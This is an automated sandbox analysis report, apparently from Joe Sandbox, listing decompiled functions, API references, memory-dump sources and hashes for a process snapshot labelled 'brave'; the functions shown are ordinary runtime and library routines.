Instruction Fuzzy Hash: 0E31B832F4711246FB569B149A4876B2195EF40B99F554434DE5EC62C0EE3EE8D1C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60152D0 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00007FF67FF6A60152D0(void* __ecx, void* __rax, long long __rdx) {
				void* _t15;
				void* _t18;
				void* _t20;
				signed long long _t25;

				_t18 = __rax;
				_t15 = __ecx;
				r12d = GetLastError();
				E00007FF67FF6A6012D40(__ecx, __rdx);
				_t1 = _t18 + 0x68; // 0x68
				_t20 = _t18;
				E00007FF67FF6A6018830(_t1, __rdx);
				if ( *((intOrPtr*)(_t20 + 0x48)) - _t15 <= 0) goto 0xa6015340;
				 *((long long*)( *((intOrPtr*)(_t20 + 0x50)) + _t25 * 8)) = __rdx;
				 *((char*)( *((intOrPtr*)(_t20 + 0x58)) + _t25)) = 1;
				E00007FF67FF6A6018870(_t1);
				SetLastError(??);
				return 0;
			}

0x7ff6a60152d0
0x7ff6a60152e0
0x7ff6a60152eb
0x7ff6a60152ee
0x7ff6a60152f3
0x7ff6a60152f7
0x7ff6a60152fd
0x7ff6a6015305
0x7ff6a601530b
0x7ff6a6015316
0x7ff6a601531a
0x7ff6a6015322
0x7ff6a601533a

APIs

GetLastError.KERNEL32 ref: 00007FF6A60152E5

Part of subcall function 00007FF6A6012D40: TlsGetValue.KERNEL32 ref: 00007FF6A6012DA0

SetLastError.KERNEL32 ref: 00007FF6A6015322
realloc.MSVCRT(00000000,?,?,00007FF6A60014F6,00007FF6A60102FB,0000017A76FB17F0,00000000,00007FFC2FC93CA0,00007FF6A60032FA), ref: 00007FF6A6015353
realloc.MSVCRT(00000000,?,?,00007FF6A60014F6,00007FF6A60102FB,0000017A76FB17F0,00000000,00007FFC2FC93CA0,00007FF6A60032FA), ref: 00007FF6A6015367
memset.MSVCRT ref: 00007FF6A601539D

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: ErrorLastrealloc$Valuememset
String ID:
API String ID: 2591390167-0
Opcode ID: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction ID: 1442bd8dfe2aa6fee57ac0c685b80611a4acc5961a8e66a2f273da60f3bf3454
Opcode Fuzzy Hash: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction Fuzzy Hash: 2A21E022B176018AEB199F3A99445AD3391EF44F98F440030DE0D8B395ED7EE8D6C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6018880 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6A6018898
ReleaseSemaphore.KERNEL32 ref: 00007FF6A60188C6
LeaveCriticalSection.KERNEL32 ref: 00007FF6A60188D3
LeaveCriticalSection.KERNEL32 ref: 00007FF6A60188F3
LeaveCriticalSection.KERNEL32 ref: 00007FF6A6018918

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction ID: 71348124ccfd62ccdb9bfd9e0d164e958f59ed2cf32104c606b9e5881417b47b
Opcode Fuzzy Hash: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction Fuzzy Hash: 5D01F523F0761683E7498B1A7C95276A250BF99FB6F844535CD1E82384DD3DE9C78300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019EC0 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6019EC0(void* __rcx) {

				if (__rcx != 0) goto 0xa6019ed8;
				return 0;
			}

0x7ff6a6019ecb
0x7ff6a6019ed4

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6A6019ED8
OpenProcess.KERNEL32 ref: 00007FF6A6019EEF
CloseHandle.KERNEL32 ref: 00007FF6A6019EFD

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction ID: 39cf3b156b5fda60c327d40c8a68e94d04ecc82f0205287ee4957db9a1c40b70
Opcode Fuzzy Hash: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction Fuzzy Hash: B8F08221A1FA0387FB285F71999413911E0BF48F5AF081934C91FC52D8EE3FB5D88220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600EB03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00007FF67FF6A600EB03() {
				signed int _t8;
				void* _t12;
				void* _t17;
				signed int** _t20;

				asm("stc");
				 *((intOrPtr*)(_t17 + 0x41909090)) =  *((intOrPtr*)(_t17 + 0x41909090)) + _t12;
				_t8 =  *( *_t20);
				if ((_t8 & 0x20ffffff) == 0x20474343) goto 0xa600ebf0;
				if (_t8 - 0xc0000096 > 0) goto 0xa600ebd7;
				if (_t8 - 0xc000008b <= 0) goto 0xa600eb88;
				if (_t8 + 0x3fffff73 - 9 > 0) goto 0xa600eb78;
				goto __rax;
			}

0x7ff6a600eb03
0x7ff6a600eb0b
0x7ff6a600eb19
0x7ff6a600eb2c
0x7ff6a600eb37
0x7ff6a600eb42
0x7ff6a600eb4c
0x7ff6a600eb5c

APIs

signal.MSVCRT ref: 00007FF6A600EBAA

Strings

CCG , xrefs: 00007FF6A600EB26

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction ID: 1f90ffb8dc6a59446e704bdc4bb2c6a8486113753806a0cbdf6fc393975e7044
Opcode Fuzzy Hash: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction Fuzzy Hash: C0212721E0E70201FA785E386A4537A11819F8AF64F1A4B36C62ED23E5DD1FE8E28301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6013D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
threadCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00007FF67FF6A6013D00(void* __edi, long long __rcx, void* __rdx, void* _a8, long long _a32, long long _a40, intOrPtr _a96) {
				intOrPtr _t9;
				long _t13;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t22;
				long long _t24;

				_t9 =  *0xa62c13e0; // 0x0
				_a8 = __rcx;
				if (_t9 == 0) goto 0xa6013d9c;
				_t22 = _a8;
				if (_t22 != 0) goto 0xa6013d50;
				r8d = GetCurrentThreadId();
				_pop(_t24);
				goto 0xa6021680;
				asm("o16 nop [eax+eax]");
				E00007FF67FF6A6013190(__edi, _a96);
				E00007FF67FF6A6013190(__edi, _a96);
				_t17 =  *_t22;
				_t13 = GetCurrentThreadId();
				_t14 = E00007FF67FF6A6013190(_t17, _a96);
				_a40 = _t24;
				r9d = _t17;
				r8d = _t13;
				_a32 =  *((intOrPtr*)(_t22 + 0x28));
				0xa6021680();
				return _t14;
			}

0x7ff6a6013d08
0x7ff6a6013d0e
0x7ff6a6013d18
0x7ff6a6013d1e
0x7ff6a6013d26
0x7ff6a6013d3a
0x7ff6a6013d41
0x7ff6a6013d45
0x7ff6a6013d4a
0x7ff6a6013d55
0x7ff6a6013d63
0x7ff6a6013d68
0x7ff6a6013d6a
0x7ff6a6013d77
0x7ff6a6013d7c
0x7ff6a6013d81
0x7ff6a6013d84
0x7ff6a6013d87
0x7ff6a6013d96
0x7ff6a6013da4

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6A6013D28
GetCurrentThreadId.KERNEL32 ref: 00007FF6A6013D6A

Strings

T%p %d V=%0X H=%p %s, xrefs: 00007FF6A6013D8F
T%p %d %s, xrefs: 00007FF6A6013D33

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CurrentThread
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2882836952-2059990036
Opcode ID: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction ID: 3ba2deaee0b024607e6b07c243533dd76d9a00ac9ccbce8f5f68d006217372a0
Opcode Fuzzy Hash: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction Fuzzy Hash: 4B01AD32B0A60181EA109B22FE140AA63A0BF84FD8F480131EE4DC7765DE3EF495C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6A600F24C
calloc.MSVCRT ref: 00007FF6A600F25B

Strings

!dso || dso == &__dso_handle, xrefs: 00007FF6A600F245
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF6A600F23E

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: _assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 615528074-4180103562
Opcode ID: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction ID: 185125dab26228b79feb2251aeef9f07fe2658d2431461a3f19bc3c6d64cc166
Opcode Fuzzy Hash: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction Fuzzy Hash: DF015E65A0A64245FB118B65FA502B92294AF94FD0F858130DE1C87785EE6EEDE1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E1F0 Relevance: 6.3, APIs: 5, Instructions: 94
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF67FF6A600E1F0(void* __rax, void* __rcx, void* __rdx, intOrPtr* __r8, intOrPtr* __r9) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				void* _t10;
				void* _t14;
				void* _t15;
				intOrPtr* _t28;
				intOrPtr* _t36;

				_t36 = __r8;
				_t28 = __r9;
				if (__rcx == 0) goto 0xa600e2e0;
				if (__rdx == 0) goto 0xa600e21b;
				if (__r8 == 0) goto 0xa600e2e0;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				if (E00007FF67FF6A600D760(_t10, _t15, __rax, __rcx, 0x7ff6a60051f0,  &_v72) == 0) goto 0xa600e320;
				if (_v48 == 0) goto 0xa600e2c0;
				if (_v72 == 0) goto 0xa600e33d;
				if (__rdx == 0) goto 0xa600e310;
				strlen(??);
				if (__rax -  *_t36 >= 0) goto 0xa600e300;
				_t14 = memcpy(??, ??, ??);
				free(??);
				if (_t28 == 0) goto 0xa600e2ad;
				 *_t28 = 0;
				return _t14;
			}

0x7ff6a600e1fe
0x7ff6a600e201
0x7ff6a600e207
0x7ff6a600e210
0x7ff6a600e215
0x7ff6a600e227
0x7ff6a600e230
0x7ff6a600e239
0x7ff6a600e242
0x7ff6a600e251
0x7ff6a600e262
0x7ff6a600e26c
0x7ff6a600e275
0x7ff6a600e27e
0x7ff6a600e286
0x7ff6a600e292
0x7ff6a600e29d
0x7ff6a600e2a5
0x7ff6a600e2a7
0x7ff6a600e2bb

APIs

strlen.MSVCRT ref: 00007FF6A600E27E
memcpy.MSVCRT ref: 00007FF6A600E292
free.MSVCRT ref: 00007FF6A600E29D

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction ID: 4c0ac837097850d4bcbf42c74eadf810c430cb6dbae6b10da47d8c822a825f4b
Opcode Fuzzy Hash: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction Fuzzy Hash: C431D222A0B64381FE654E12B34437B5690BF54F9CF490531EE4E9A3D4DF3EE8E48600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601D380 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6A601D471

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction ID: 9dc05c7faf5b4747db2c2e860382e69649e99754d6d9c51fce01b40f8c413df4
Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction Fuzzy Hash: DBC1F8A3E1A65147E7214B28820433A27A1BF14FACF254235DE1D977C5CE3EF8E68750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601A7D0 Relevance: 6.3, APIs: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6A601A8C1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction ID: 43402cb44d04fc607f8830f7c80d963bb53b7d9d512f7d53c43b6dad6df8491f
Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction Fuzzy Hash: 1AC1E663E1A28246E7214A24831437A2AA1FF04F6CF158235DE5D977C5CE3FECE68760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600D760 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315
stringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF67FF6A600D760(signed int __eax, signed int __edx, void* __rax, signed char* __rcx, long long __rdx, long long __r8) {
				signed int _t83;
				void* _t86;
				int _t89;
				signed int _t91;
				void* _t94;
				signed int _t108;
				void* _t111;
				void* _t113;
				long long _t137;
				signed long long _t140;
				unsigned long long _t160;
				long long* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				signed long long _t182;
				void* _t184;
				signed char* _t188;
				void* _t189;
				signed char* _t190;

				_t167 = _t166 - 0x218;
				_t165 = _t167 + 0x80;
				r15d =  *__rcx & 0x000000ff;
				_t111 = r15b - 0x5f;
				if (_t111 == 0) goto 0xa600dad0;
				asm("repe cmpsb");
				asm("sbb al, 0x0");
				r14d = 0;
				if ((__eax & 0xffffff00 | _t111 > 0x00000000) != 0) goto 0xa600d7e0;
				_t113 = (__rcx[8] & 0x000000ff) - 0x24 - 0x3b;
				if (_t113 > 0) goto 0xa600d7e0;
				asm("dec eax");
				if (_t113 >= 0) goto 0xa600d7e0;
				_t83 = __rcx[9] & 0x000000ff;
				if (_t83 == 0x44) goto 0xa600db10;
				if (_t83 == 0x49) goto 0xa600db10;
				strlen(??);
				 *((long long*)(_t165 - 0x50)) = __rcx;
				 *((intOrPtr*)(_t165 - 0x40)) = 0x11;
				r8d = __rax + __rax;
				 *((long long*)(_t165 - 0x48)) = __rax + __rcx;
				 *(_t165 - 0x38) = __rcx;
				 *(_t165 - 0x24) = r8d;
				 *((intOrPtr*)(_t165 - 0x28)) = 0;
				 *((intOrPtr*)(_t165 - 0x14)) = __edx;
				 *((intOrPtr*)(_t165 - 0x18)) = 0;
				 *((long long*)(_t165 - 0x10)) = 0;
				 *((long long*)(_t165 - 8)) = 0;
				 *_t165 = 0;
				if (r8d - 0x800 > 0) goto 0xa600dab3;
				_t86 = E00007FF67FF6A600F680(0);
				_t168 = _t167 - (r8d << 5);
				_t160 = _t168 + 0x27;
				E00007FF67FF6A600F680(_t86);
				_t169 = _t168 - (0x0000000f + __edx * 0x00000008 & 0xfffffff0);
				 *(_t165 - 0x30) = _t160 & 0xfffffff8;
				_t137 = _t169 + 0x20;
				 *((long long*)(_t165 - 0x20)) = _t137;
				if (r14d == 1) goto 0xa600dae8;
				_t23 = _t189 - 2; // -2
				if (_t23 - 1 > 0) goto 0xa600daf8;
				_t190 =  &(__rcx[0xb]);
				 *(_t165 - 0x38) = _t190;
				if (__rcx[0xb] != 0x5f) goto 0xa600d8b8;
				if (__rcx[0xc] == 0x5a) goto 0xa600dc32;
				 *(_t165 - 0x60) = _t160 >> 3;
				 *(_t165 - 0x54) = r8d;
				_t89 = strlen(??);
				r8d =  *(_t165 - 0x54);
				_t182 =  *(_t165 - 0x60);
				if (r8d <= 0) goto 0xa600dbf3;
				 *((long long*)(4 + _t182 * 8)) = 0;
				 *((intOrPtr*)(_t165 - 0x28)) = 1;
				if (_t89 <= 0) goto 0xa600dbf3;
				 *(_t182 * 8) = 0;
				 *(0x10 + _t182 * 8) = _t190;
				 *(0x18 + _t182 * 8) = _t89;
				r9d = 0;
				E00007FF67FF6A6004DD0();
				strlen(??);
				_t188 =  &(( *(_t165 - 0x38))[_t137]);
				 *(_t165 - 0x38) = _t188;
				_t91 =  *_t188 & 0x000000ff;
				if (_t91 != 0) goto 0xa600daee;
				if (_t137 == 0) goto 0xa600daee;
				 *((long long*)(_t165 + 0x120)) = __rdx;
				_t184 = _t165 + 0x10;
				 *((char*)(_t165 + 0x118)) = 0;
				 *((long long*)(_t165 + 0x110)) = 0;
				 *((long long*)(_t165 + 0x128)) = __r8;
				 *((long long*)(_t165 + 0x130)) = 0;
				 *((long long*)(_t165 + 0x138)) = 0;
				 *((long long*)(_t165 + 0x140)) = 0;
				 *((long long*)(_t165 + 0x148)) = 0;
				 *((intOrPtr*)(_t165 + 0x150)) = 0;
				 *((long long*)(_t165 + 0x158)) = 0;
				 *((long long*)(_t165 + 0x160)) = 0;
				 *((long long*)(_t165 + 0x168)) = 0;
				 *((long long*)(_t165 + 0x170)) = 0;
				 *((long long*)(_t165 + 0x178)) = 0;
				E00007FF67FF6A60050B0();
				if ( *((intOrPtr*)(_t165 + 0x144)) - 0x7ff > 0) goto 0xa600da0c;
